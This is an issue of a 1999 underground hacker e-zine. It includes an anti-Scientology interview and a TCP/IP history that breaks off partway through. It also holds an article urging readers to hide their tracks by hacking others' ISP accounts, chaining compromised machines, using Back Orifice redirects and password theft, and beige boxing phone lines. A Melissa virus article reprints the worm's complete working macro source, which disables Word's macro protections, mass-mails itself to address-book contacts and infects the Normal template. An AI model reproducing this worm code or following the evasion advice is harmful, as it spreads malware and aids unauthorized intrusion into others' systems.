___________.__ ________ ____. \__ ___/| |__ ____ \______ \ ____ | | | | | | \_/ __ \ | | \ / _ \ | | | | | | \ ___/ | -` ( <_> )\__| | |____| |___| /\___ > /_______ /\____/\________| \/ \/ \/ :The Discordant Opposition Journal: :Number #5: :May 99, Sixth Release, http://www.Rue-the-Day.net/discordia: Chained on the burning lake; nor ever thence had risen or heaved his head, but that the will and high permission of all ruling heaven. Left him at large with his own dark designs, that with reiterated crimes might heap on himself DAMNATION ! -John Milton _____________ -= [DoJ Related Stuff] =- ! PLEASE READ THE EDITORIAL ! the head punk : Rue-the-Day root@rue-the-day.net gothic coordinator : cronus cronus@iol.ie assistant head crusher : Digital Avatar apparitione@gmx.de in-house thug #1 : Kleptic kleptic@grex.org in-house thug #2 : RELM relm6@hotmail.com articles, rants and editorial email to : discordia@Rue-the-Day.net DoJ distribution site : http://www.Rue-the-Day.net/discordia inspirational reading : 'Use of Weapons' by Ian M. Banks This issue is dedicated to the following; Garry Garcia, Elvis, Sid Vicious and Jimmy Hoffa All great discordians in thier time. :We'd like to thank ethercat for her continued support with the DoJ: :Submissions of the usual mix of informative articles, graphics for the: :gallery, logs, saucy humour, quotes and whatever are GREATLY appreciated: :Erotic submissions ? We're still waiting...: ------------------------ The Discordant Opposition Journal Number 5, May 1999. All Rights Reserved. Nothing may be reproduced in whole or part without written permission from the editors. The DoJ is made public at irregular periods, but don't worry you won't miss us. ---------------------------------------------------- -=[ DoJ Number 05 ]=- ---------------------------------------------------- File: [01] editorial [behind the scenes]............the editors [02] quenching the source...................cronus [03] interview with ethercat................editors [04] a look at the melissa virus............relm [05] protocols and such.....................digital avatar [06] the ancient art of port surfing........cronus [07] biometrics.............................infinity matrix [08] the chernobyl virus....................relm [09] dr klep speaks...........................kleptic [10] conclusion [wrapping it all up]..........the editors ---------------------------------------------------- :Editorial: "Behind the scenes..." The DoJ is an irregularly released Underground Zine. The DoJ covers every aspect of Underground culture from Virii to Hacking and from Drugs to Fiction. This editorial is going to just give an insight into the world of the DoJ and an intimate look behind the scenes. The DoJ Editors are glad to announce the introduction of a new member. RELM joins us as an in-house writer. Himself and Kleptic will be featured with regular sections. We'll get round to interviewing RELM before too long. As you all know we have some semi-regular features in the DoJ. We try to include an interview with some member of the Underground each issue, this week ethercat is interviewed. ethercat offered us space to host the DoJ site when no on else would. She definetly goes down in Discordian History as a class hacker chick. Both the editors knew Kleptic from a long time ago. He was a part-time hacker and part-time trouble maker. Of course he'd despute that... So when we were starting the DoJ we talked with Kleptic and asked if he'd like to be involved. We really didn't know Digial Avatar much, but extremely quickly he showed hugh ammounts of interest in helping and was quickly offered the Assistant Editor position. Digital started be writing but his role in the DoJ has shifted more toward advertisment and getting the word out. We have had draught periods so far. The flow of articles has always been slowly then we thought it would. We know we have a large coverage by the mail we get and also talking to people online. But despite that, people seem reluctant to write. We have always pushed the DoJ to be a more Underground zine rather than a technical hacking or phreaking zine. And to that end, we publish articles on dozens of Underground topics. Nothing is unspoken... If you've enjoyed reading any of the past issues of the DoJ or you agree with our ideal but don't thick we've followed through properly, then you have an obligation to help. Helping can be anything from submitting articles, submitting art for our gallery or just general advertising. This isn't us working for you like with regular print publications. This is a Zine, this is the wider Us making a living breathing publication. You are all a part of the DoJ as we the staff are. Just give that some thought... The Editors::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 ::: The Discordant Opposition Journal ::: Issue 5 - File 2 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Quenching the Source: cronus Any hacker who has ever hacked anything more immpressive then his Linux partition will tell you that the most important part of hacking is hiding your own location. It is so essential to hide your location that it becomes instinctive for hackers. I shall discuss some techniques, both new and old, of hiding you real location. ISP The most important part of your hacking sequence is going to be your net account. If you are traced back to your ISP, then their logs will be able to tell the victim who you are, where you live and what you eat for breakfast. You can avoid being traced back to your own account by hacking someone else's net account and using that. Some Internet Providers allow you to set up a Guest account so you can test their services. If you can’t hack another account on an ISP, then you should try to get your hands on a Guest account to hack from. It is necessary that you don’t hack from your own account so that you aren’t traced to your name and address. Getting a Guest account should be easy enough. Contact an ISP and ask about their services. Then ask if you can have a Guest account to see if it compares to the others. You will need to give false information to the ISP so that you are safe. Bounce After all this, you are still possibly being traced to your city and general location. So next you want to hide your geographical location, as well as your net location. There are several ways to hide your physical location. First is a practice that has essentially vanished from the mainstream. Wingate is a software package that allows many computers to connect to the internet through a single internet connection. A hole in the Wingate system was found that allowed people to bounce thier connection from the Wingate machine. Wingating can be used to 'bounce' your data packets off another system, to hide your IP address. Back Orifice is a trojan hacking program that allows people to take control on certain functions on infected computers. The 'redirect' option allows for IP redirects to be set up. A redirect is set up on an infected computer. Any packets that are sent to the redirect port on the infected machine will be bounced to the new destination without being logged. This is a very anonymous way of bouncing a connection. And several infected computers can be strung together to add greater protection. Also the 'system password' option in Back Orifice allows people to view any cached passwords on the infected system. This can often render ISP passwords, letting you attack from a false account. Also many companies over the net offer free shell accounts and these are perfect ways to hide your IP address. You connect to the shell account and do your hacking from there and so hide where you are coming from. Again you will need to give false information for that to so that you are totally safe. Phone You may want to take the added precaution of hacking from a different phone line. By this I mean with a laptop at a pay phone or even in an Internet cafe. Preferably one that allows you some privacy. You can connect a laptop to the side of pay phone or even the side of a house. This is called beige boxing and is used widely by phreaks. Next is out-dials. These are diminishing fast, because of their use by hackers, but some universities still run them for their students. An out-dial is a computer that is set up to let you dial out over its modem to another computer. These can be used to call another system and from their you can hack away. This means that the trace can only go as far as the out-dial and then it would slow down any trace allot as anyone tries to move the trace to the university line. If the University is logging the connection then they will have your IP address. But if you are spoofing your IP address or if you are using another net account that isn’t yours then this isn’t a problem. Spoofing IP spoofing is an extremely complex and difficult technique used by hackers to hide their IP address. I can and will only skim the surface of spoofing, giving you enough information so that you can go and search for more information on your own. If you have root access on an UNIX machine, then you can program a program to hide your IP address in data packets. By creating custom made packets you can choose what information to include, so you can obscure your connection address. IP spoofing takes a huge ammount of skill as you must adhere to known Internet standards. My site at http://homepages.iol.ie/~cronus has some excellent files on IP spoofing. Systems As a hackers repertoir of hacked computers grows, it can be very useful to route your connection through them. The more connections you have and the more often you rearrange the stops, the less likely you are of being traced to your originating connection. The more connections you can make between you and the victim, the better you have hidden your location, your identity and your freedom. All this may seem like basic ideas that you would have used anyway. But you'd be surprised at how many elite hackers have been arrested because they got too big headed and neglected to use any protection. Also remember that you should change the route you take each time. This is so that over a few different hacking sessions you aren't slowly traced section by section. If you change the route often then you will make each trace a brand new one. ... intoxicated with the madness ... cronus (at) iol (dot) ie ___________ ____ ____ __ __ ______ _/ ___\_ __ \/ _ \ / \| | \/ ___/ \ \___| | \( <_> ) | \ | /\___ \ \___ >__| \____/|___| /____//____ > \/ \/ \/ http://homepages.iol.ie/~cronus ::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 ::: The Discordant Opposition Journal ::: Issue 5 - File 3 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Interview with Ethercat: The Editors Ethercat is one of the founding fathers/mothers of the DoJ giving us space to host the site when no one else would. We had a discussion with her just recently on the topic of the Scientologists and those that picket them; DoJ: How did the picketing go ? It went great. We had 5 people there, and we did it for an hour. And we all got our pictures taken by the cult photographer. DoJ: Of course you should stand for what you believe in, but DoJ: equally you should never shun anyone who hasCo$ beliefs DoJ: simply because they have their own beliefs. Everyone is DoJ: entitled to their opinion. DoJ: [ BTW I am just being devil's advocate... for the sake of DoJ: discussion...] I am glad you said that, and I don't mind discussing it. I appreciate that you want to keep an objective point of view, and that you want to allow everyone the freedom to believe in any religious beliefs that they choose. I also appreciate that you want to know more about the organization, which is what I protest. I'm glad you're looking at both sides with skepticism. I did too, at first. Your readers who are unfamiliar with scientology may want to visit Xenuphobe's excellent overview of scientology: http://members.tripod.com/~bwarr/ Believe me, and I will show you, it is not about religious beliefs. It is about actions taken by the Church of Scientology organization as a whole, which are unethical in the best of cases, and criminal in many cases. I think most individual scientologists have good intentions, but are deluded. The problem is that the policies and teachings of scientology, written by L.Ron Hubbard, are, at the core, sinister and driven by paranoia and greed. They are actions which hardly befit a church, especially a tax-exempt one. I should also point out that Dianetics, referred to as "Hubbard Tech" by scientologists, is presented as a form of self-help (however questionable) with the purpose of funnelling people into Co$, while not revealing that it claims to be a religion, a sort of "bait and switch" tactic. DoJ: I do disagree with what theCo$ people do. They target youths DoJ: and vulnerable people. Pulling people off the street that fit a DoJ: certain 'profile' of vulnerable targets. But simply targeting youths and vulnerable people to be drawn into their religion is far from all that the Church of Scientology (Co$) does. They harass people with intimidation, lawsuits, private investigators, and threats to uninvolved other people (friends, relatives, business associates), etc. in an attempt to prevent damaging information from being exposed. They attempt to stifle forums of free speech where people meet and discuss their experiences with scientology. Free and relatively anonymous communication on the internet threatens the Co$, and they in turn threaten the newsgroup alt.religion.scientology, and have made several attempts to close it down with massive DoS attacks. If your readers are interested in maintaining free exchange of information, they may want to look into some of this further. http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,224578,00.html http://www.modemac.com/Co$/Co$2.html http://www2.thecia.net/users/rnewman/scientology/home.html They tie up the legal system with frivolous lawsuits, purely for harassment purposes, as recommended in Hubbard's writings as a way to "handle" critics. It is the very filing of such frivolous cases which makes other, more important cases take so long to make it into the courts. (Think about how long Kevin Mitnick waited in jail for a closing to his recent case; civil cases often go on much longer, sometimes with as much stress and more financial hardship to the defendant, as their lives hang in the balance.) They picket the residences of critics, trying to give back what they get, but picketing a residence is illegal in most of the US, while picketing a commercial property is not. They spread vicious innuendo against critics in their neighborhoods and in Co$ publications. This slanderous technique is referred to in Hubbard documents as "Dead Agenting", attempting to make critics appear disreputable and destroy their credibility so no one will listen to their criticisms. They run front organizations, designed to falsely enhance public opinion of scientology or funnel new members into the Church of Scientology, some of which make no mention of the use of scientology teachings. Some are management courses which a scientologist employer requires employees take as a condition of working there, which then indocrinates the employees into scientology. They have numerous branches with different names providing various services to the main scientology organization, which make it difficult to track the flow of money from one to another. Some examples of these are RTC, the Religious Technology Center, which handles distribution of books, tapes, products, and courses; Bridge Publications, which does the printing of Co$ publications; Golden Era Studios, where commercials, tapes, and videos are made for Co$, and numerous others. They achieved tax exempt status through a secret deal with the IRS, agreeing to drop litigation against the IRS and stop harassment of individual IRS employees in exchange. So all their lawsuits and activities and income are tax exempt, however their tax-exempt status is up for a final evaluation this year, and it's not too late for concerned Americans to write to their congressmen urging an investigation into the matter. They encourage an "us against them" attitude in their members toward anyone who is not a scientologist, and teach that if anyone so much as questions the words or absolute authority of L. Ron Hubbard, it is because they have crimes they wish to conceal. People who speak out critically are labeled "Supressive Persons" or SPs, and any action which a scientologist feels he must take to protect Co$ is considered ethical by scientology and Hubbard's writings. Scientology has as its goal "clearing the planet". "Clearing" is a process that involves taking numerous classes from Co$, and undergoing "auditing", a pseudo-psychotherapy practiced by "specialists" recognized only by the Co$. This is done at great expense to the person being cleared. Those who cannot be cleared (as defined by Hubbard) or who will not be cleared should "be disposed of quietly and without sorrow". Did I mention that you must be a scientologist in order to be considered cleared? They do all of this, based on directives written into L. Ron Hubbard's administrative policies, directives written by Hubbard himself to silence critics and prevent would-be-ex-members from leaving the organization and talking, because they might say too much. Rather than address people's concerns with answers, they follow Hubbard's teaching, "Never defend. Always attack." http://wpxx02.toxi.uni-wuerzburg.de/~cowen/go/philosop.htm You can read who may be attacked, and how they may be "handled" (what may be done to them) in Hubbard's own words from 1959; his "Manual of Justice" is located at: http://www.innernet.net/joecisar/ars1007.htm Does a religion have a right to dispense justice, or should that be reserved for the justice system in the country involved? And do these words sound like the words of a religious man? Scientology uses language to its own ends. Great emphasis is placed on properly defining words, which sounds good until you realize that the dictionaries which scientologists use to look up misunderstood words are Hubbard-written dictionaries. The importance of specialized language to a group, with a focus on scientology, is examined in Richmann's essay called "Language, Jargon and Mind Control", originally posted to the newsgroup alt.religion.scientology, and archived at: http://www.users.wineasy.se/noname/jargon.htm Hubbard's and his followers' ideas of justice vary greatly from what you and I think of as justice. For instance, several people have died mysteriously, after expressing a desire to leave the "church", and people who were there at the time have now come forth and told what happened. Many of them, unless they laid low and kept silent, have been framed for crimes they didn't commit, or brought into legal battles with this "church"; and generally harassed to make their life a living hell. Some examples: Paulette Cooper - "Operation Freakout" Wrote a book about Co$, The Scandal of Scientology, then was arrested for sending bomb threats to them. Documents confiscated during an investigation and raid another scientology "operation", Operation Snow White, were found to include instructions on how to frame Paulette Cooper. Her court deposition is here: http://wpxx02.toxi.uni-wuerzburg.de/~krasel/Co$/cooper/ "Operation Snow White" was an infiltration of government offices around the world by scientologists, for the purpose of illegally removing documents considered harmful to the Co$. One person recently posted that their friend, a scientologist, justifies Operation Snow White by saying "the government was going to remove the documents anyway, we were just helping them". http://wpxx02.toxi.uni-wuerzburg.de/~cowen/go/ops/go732/go732.htm Lisa McPherson - A member of Co$ A scientologist working for a Co$ publishing company, making upwards of $100,000 a year and donating much of it back to the church (in 1994 it was $75,275 for services, and another $55,000 as a donation), died under mysterious circumstances, after telling friends she wanted to leave Co$, and telling paramedics at the scene of an accident, "I need help. I need to talk to someone," saying she had been doing "wrong things [she] didn't know were wrong." and identifying herself as a Scientologist. Amidst a lot of dodgey statements to the press, the Church of Scientology was indicted in her death. This is still playing out in the courts as I write. Read more about it here on Jeff Jacobsen's Lisa Memorial Page: http://www.primenet.com/~cultxpt/lisa.htm And read the indictment here: http://www.kcii.com/~dallara/indictment2.html Other critics have their computers seized, internet and web hosting accounts closed down by ISPs who haven't the resources to determine whether complaints are valid, and would rather not go head to head with Co$, some have found dead animals at their doorstep; the examples seem endless. I will summarize some URLs for your readers at the bottom. DoJ: Back to the picketing... Does it really make much of a DoJ: difference ? Yes, it does, in several ways. It lets the surrounding public know who the organization is, and gives us an opportunity to tell them some of the things Co$ usually tries to hush up. In addition to the general public, the people we talk to sometimes include potential members, and sometimes their own members, who will not get all the facts from Co$. Some members who are on the net have installed Co$ web filtering software to keep them from reading anything critical of scientology. It's similar to Cybersitter, and jokingly referred to ScienoSitter or ScienoNanny, and I'm proud to say that my name is on the "banned words" list. Here's some info about the filtering software. http://www.xs4all.nl/~johanw/Co$/nanny.html A fringe benefit is that it allows us to meet other local critics in person, which is nice, since much of the discussion is done online. The other way picketing helps is more complicated: It scares the cult into acting stupidly, in accordance with L.Ron Hubbard's vicious teachings, and that behavior also informs more people about their tactics. They don't know how to deal with people who won't be silenced by intimidation. They must act accordingly with L.Ron Hubbard's teachings (specifically) which are outdated and he's dead so he can't revise them to keep up with changing technology. To change Hubbard's writings and church policies is considered "out-tech". Because they've depended on their strongarm tactics to keep people quiet; and because L.Ron's outdated policies don't cover how to deal with picketers, or the internet and people being able to talk to each other and compare notes, they will try to pull some ludicrous stunt that is intended to threaten a single person. In the past, would have just made the single person look crazy or paranoid to others, and their finding no where to turn for support, would have been "shuddered into silence". But now, with the newsgroup (alt.religion.scientology), IRC (#scientology), mailing lists and private email, people talk, an see the same tactics repeated over and over, and they can and do document and publish these tactics, and figure out how to take their own precautions. Co$ draws new members from the public, and the more the public knows what Co$ is up to, the fewer potential members there are out there. Picketing gets attention, and then anyone who stops to find out what's up gets pointed to the internet. You would be surprised how many people already know some things about Co$, and want to find out more, then they find out there is so much activism already in progress - it's easier to join a movement than to start one - and they become active too. In addition, people inside the org see the picket and may wonder what they're not being told. This leads to what is termed "a condition of doubt" by Hubbard, and must be handled by the person's "Ethics Officer". "Conditions of doubt" are often a predecessor to a member "waking up" (as it has been called by ex members) and realizing the truth that Co$ hasn't told them. One scientology org even went so far as to hang a giant tarp between the org and the picketers, to keep the members from seeing the picket, rather than answering questions from members regarding what the picket was about. A while back,Co$ issued a rmgroup to remove the newsgroup, alt.religion.scientology, and once the net (or you know, those old netizens who have been here forever?) heard about it, people who couldn't have cared less about a cult and their members were now jumping in to defend the net, and their freedom to speak publicly. A lot of hackers got involved in fighting Co$ then, as did admins, the EFF, and other people who heard about it and didn't think it was right. Now when Co$ tries to hush up harassment and other things they've done, people have a place to discuss it with others, and more people become outraged and begin speaking out themselves. It is jokingly called "Operation Footbullet" on ars. DoJ: But isn't doing anything more then raising awareness DoJ: about what C0$ does is just propaganda from your side of the DoJ: field? Don't you think that trying to attract people off the DoJ: street to come and listen to your own rants and raves about DoJ:Co$ activity is just as deceptive. No, I don't think it is deceptive at all. Raising awareness is what we want to do, and then let people who are aware of all the facts draw their own conclusions. We walk around with signs and if people want to stop and talk, they can. We generally provide flyers with pointers to more information if they are interested. We present facts which are well-documented, and which Co$ will NOT present. DoJ: You talked of people wanting to help fight whatCo$ does, but DoJ: in the same sentence you said how little the public knows DoJ: about the situation. They can either hear what theCo$ people DoJ: say and believe that or hear what you and your people say and DoJ: believe that... We want them to hear both sides, including that which they will not hear from Co$, and then make up their own minds. We are confident that rational people, armed with the facts, will not join the Co$. They get to hear our side for free, and investigate further for themselves on the internet. To hear Co$' side, in scientology words, "to go up the bridge" (find salvation, reach nirvana, become enlightened, whatever, the top goal in a religion), they have to spend somewhere in the area of $360,000 over a long period of time. That would buy a nice respectable house in a nice neighborhood here, and people take out loans for 30 years for stuff like that. Should finding out about your religion's teachings Co$t as much as a house? Co$ does not freely publish their religious teachings. The net does. And before anyone begins spending any money with theCo$, I strongly suggest they investigate these religious teachings on the net first. DoJ: Aren't your tactics potentially worse then theirs? To bring about either the reform or destruction of a cult bent on ruling the world? No. ***************************************************************** Here are a few more URLs for readers to check out for themselves: OPERATION CLAMBAKE: http://www.xenu.net BELIEFS: The Official Church of Scientology Web Site: http://www.scientology.org In case you don't find any of the religious beliefs spelled out there, here are a few more sites which are more forthcoming: http://www.dtek.chalmers.se/~d1dd/Co$/pan27.html NOTs Scholars Page: http://w4u.eexi.gr/~antbos/NOTSINDE.HTM http://www.cs.cmu.edu/People/dst/NOTs/ The Christian View of Scientology: http://bible.ca/scientology-explained-simple-cri.htm BOOKS ONLINE: Martin's Booklist: http://www.ncf.carleton.ca/~av282/books.htm http://www.cs.cmu.edu/~dst/Library/hunt-booklist.html CRIMINAL ACTIONS: Crime, Deaths, Illegal Activities, and the Courts: http://mars.superlink.net/user/mgarde/ Deaths At FLAG: Why are these people dead, scientology? http://home.wxs.nl/~mike_gormez/deaths.html The Crimes of Scientology: http://www.ezlink.com/~rayr/doc/ Scientology's Secret Service: http://wpxx02.toxi.uni-wuerzburg.de/~cowen/go/ The strange links between the Co$-IRS agreement and the Snow White Program: http://wpxx02.toxi.uni wuerzburg.de/~cowen/essays/irs-snow.html The Clearwater Body Count: http://www.kcii.com/~dallara/bodycount.html Is Scientology breaking the law?: http://www.scientology-lies.com/investigation.html SINISTER POLICIES: Things To Keep In Mind: http://www.xenu.net/archive/co$pls.html Co$ PARANOIA: Note: this is an official Co$ page. Co$ believes that a worldwide, organized conspiracy exists which is behind all criticism, and that critics are paid to participate in this "hate campaign". Behind the Worldwide Campaign: http://opposing.scientology.org/31-behnd.htm SCIENTIFIC STUDY: 404 Not found. No published evidence has been found which substantiate the claims of L.Ron Hubbard. HARASSMENT: Scientology Pickets Individuals: http://alley.ethercat.com/pickets/pktsind.htm Pickets and other harassment by Scientology: http://alley.ethercat.com/pickets/sp0000.htm Co$ VS THE NET: Attack of the Robotic Poets, by Kevin Poulsen: http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2254578,00.html The War between Scientology and the Internet: http://www.gbar.dtu.dk/~c958587/intro/Co$2.html The Church of Scientology tries to censor Usenet: http://www2.thecia.net/users/rnewman/scientology/usenet/cancel.html The Church of Scientology vs. the Net: http://www2.thecia.net/users/rnewman/scientology/home.html The Church of Scientology vs. anon.penet.fi: http://www2.thecia.net/users/rnewman/scientology/anon/penet.html Co$ FRONT GROUPS: http://www.snafu.de/~tilman/prolinks/index.html#Co$_business http://glenn11.home.mindspring.com/truth/front.htm SCIENTOLOGY-RELATED TERMS: ARS Acronym/Terminology FAQ v3.5: http://www.ncf.carleton.ca/~av282/terms.htm PICKETING: International Pickets Against Scientology: http://alley.ethercat.com/pickets/picket.htm Recent pickets of $cientology offices around the world: http://207.112.193.9/Panorama.cgi$pickets~Listing Songs to sing while picketing: http://extra.newsguy.com/~marina/spsongs/ OPERATION FOOTBULLET: http://www.xenu.net/archive/footbullet/ NEWSGROUP: news:alt.religion.scientology ::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 ::: The Discordant Opposition Journal ::: Issue 5 - File 4 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :A Look At The Melissa Word Macro Virus: By RELM [The Virus] Im sure you have heard about the Melissa Virus, Most people have. The Microsoft Word virus known as Melissa started spreading Friday, March26, 1999, This virus spread fast threw the internet. In just a couple of days this virus spread Worldwide and infected Thousands If not Millions of computers around the world faster then any virus to date. This virus spreads when you execute an infected document, If you use Outlook shipped with Internet Explorer 4.+ as your mail client then the Melissa virus would send itself to the first fifty people on your address book. Now the fifty people on your address book would send the virus to another fifty people so on and so on. [The Job] The Melissa virus infects MS Word 97 and MS Word 2000 documents and goes about by adding a new VBA5 module named Melissa. Now before the virus attempts to do a mass mailing it looks for the following registry key in the registry: "HKEY_CURRENT_USER\Software\Microsoft\Office\" as "Melissa?" value. If the virus finds this value in the key "Melissa?" set to the value "... by Kwyjibo" it will not attempt another mass mailing because a mass mailing has allready been done on the current machine. If the virus does not find this value in the key then it will attempt a mass mailing, First the virus would open Outlook then useing MAPI calls it would use the user profile set in Outlook, The virus would then create a new E-mail message with the following subject "Important Message From Joe" (Joe being the user profile), Then the body of the e-mail would say "Here is that document you asked for ...don't show anyone else ;-)", Next the virus would create an attachment to the e-mail and the attachment would be the infected Word document, After this is done the sequence is complete and the messages are mailed to the fifty people on the users address book. [The Virus Creates Security For Itself] To create more security the virus deactivates the Tool-Macro Menu is MS Word 97 and in MS Word 2000 it deactivates the Macro-Security Menu. Now to hide its infection activities the virus disables the Save Normal Template Option, The Confirm conversion at Open option and the Macro virus protection option. Doing this would make the user to not be able to know that there is a macro virus in the document. [Just For Fun] Once every hour the virus triggers an action, At a certain min (A Minute that is specified) past the hour corresponding to the date, If you open a infected document at the appropriate minute the virus will insert the following text "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." into the infected document. [Conclusion] The base of the melissa virus is not unusual, The thing that is unusual about the virus is the way it spreads threw e-mail and how it travels threw the internet in such little time. Now you should by now have a clear understanding of the Melissa Virus and the way it works, I have tried to outline some inportant facts about the virus and hopefully give you a better understanding of it. Everything that I have explained in this document can be clearly seen in the source code at the bottom of this text. [The Code] This is the Melissa Word Macro Virus code, I trust that you will use this for nothing more then learning. /--------The Melissa Word Macro Virus Code: Start--------\ Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub \--------The Melissa Word Macro Virus Code: End--------/ This concludes the Melissa Word Macro Virus Text written by Relm. Please Visit The Fallen Angels Webpage At: http://fallenangelz.cjb.net ::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 ::: The Discordant Opposition Journal ::: Issue 5 - File 5 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Protocols and Such: Digital Avatar The internet and all the glorious resources out there would have been strictly prohibited (until a different solution came along) if TCP/IP would not have been developed. This is really everything that makes it work. Without it, connecting to other computers would be many, many times more a task than it is. Perhaps no organization has more complex networking requirements than the U.S. Department of Defense. Simply enabling communication among the wide variety of computers found in the various services is not enough. DoD computers often need to communicate with contractors and organizations that do defense-related research, such as universities. Defense-related network components must be capable of withstanding considerable damage so that the nation's defenses remain operable during a disaster. TCP/IP enables such communication, regardless of vendor or hardware differences, to occur. The fact that the DoD initiated research into networking protocols (investigating the technology now known as packet switching) is not surprising. In fact, research on the protocols that eventually became the TCP/IP protocol suite began in 1969. There were several important goals for this research. These goals are the foundation of TCP/IP. Common Protocols; The DoD required a common set of protocols (communications rules) that could be specified for all networks. Common protocols would greatly simplify the procurement process because the systems could communicate with each other. Interoperability; If equipment from various vendors could interoperate, the system development efficiency could be improved and competition among vendors would be promoted. Robust Communication; A particularly dependable network standard was required to meet the nation's defense needs. These protocols needed to provide reliable, high-performance networking with the relatively primitive wide area network technologies then available. Ease of Reconfiguration; Because the DoD depended on the network, reconfiguring the network and adding and removing computers without disrupting communication needed to be possible. In 1968, the DoD Advanced Research Project Agency (then called DARPA, but since renamed ARPA) initiated research into networks using the technology now called packet switching — the capability to address a packet and move it to the destination through different networks. The first experimental network connected four sites: the University of California at Los Angeles (UCLA), the University of California at Santa Barbara (UCSB), the University of Utah, and SRI International. Early tests were encouraging, and additional sites were connected to the network. The ARPAnet, as it came to be called, incorporated 20 hosts by 1972. NOTE: You will encounter the terms Internet and internet, and should be aware of an important distinction between them. An internet (short for internetwork) is any network comprised of multiple, interconnected networks, normally within one company (also referred to as an intranet). The Internet is the global internetwork that traces its lineage back to the ARPAnet. In 1986, groundwork was laid for the commercialization of the ARPAnet. The ARPAnet backbone was dismantled, replaced by a network funded by the National Science Foundation. NSFnet now functions as the Internet backbone. The Advanced Network Services (ANS) manages the NSFnet. The initial set of TCP/IP protocols was developed in the early '80s. These protocols became the standard protocols for the ARPAnet in 1983. The protocols gained popularity in the user community when TCP/IP was incorporated into version 4.2 of the BSD (Berkeley Standard Distribution) UNIX. The BSD version of UNIX is used widely in educational and research institutions. It became the foundation of several commercial UNIX implementations, including Sun's SunOS and Digital's Ultrix. Because BSD UNIX established a relationship between TCP/IP and the UNIX operating system, the vast majority of UNIX implementations now incorporate TCP/IP. Many different people were involved in the development of the TCP/IP protocol suite. This presented a need to facilitate the sharing of ideas. A process did evolve that enabled everyone to comment on the proposed definitions of the different standards. Basically, someone would draft a standard and the document would be published for review. This became the Request for Comments (RFC) process. On its way to becoming a standard, a protocol passes through different stages. The protocol starts as a Proposed Standard. It may be promoted to a Draft Standard, and finally to a full-fledged Standard, an official standard protocol for the Internet. At each stage, the protocol faces review, debate, implementation, and testing. Proposed Standards, for example, go through at least six months of review before they may be promoted to a Draft Standard. In general, promoting a standard requires two independent implementations of the protocol. Obviously this process would break down if no one actually monitored it and made decisions when required. The body that takes care of this for the TCP/IP protocol is the Internet Activities Board (IAB). The IAB coordinates design, engineering, and management of the Internet. The IAB has two task forces: the Internet Engineering Task Force (IETF) and the Internet Research Task Force (IRTF). Unlike other groups, the IAB is made up of volunteers rather than the government, DoD, or 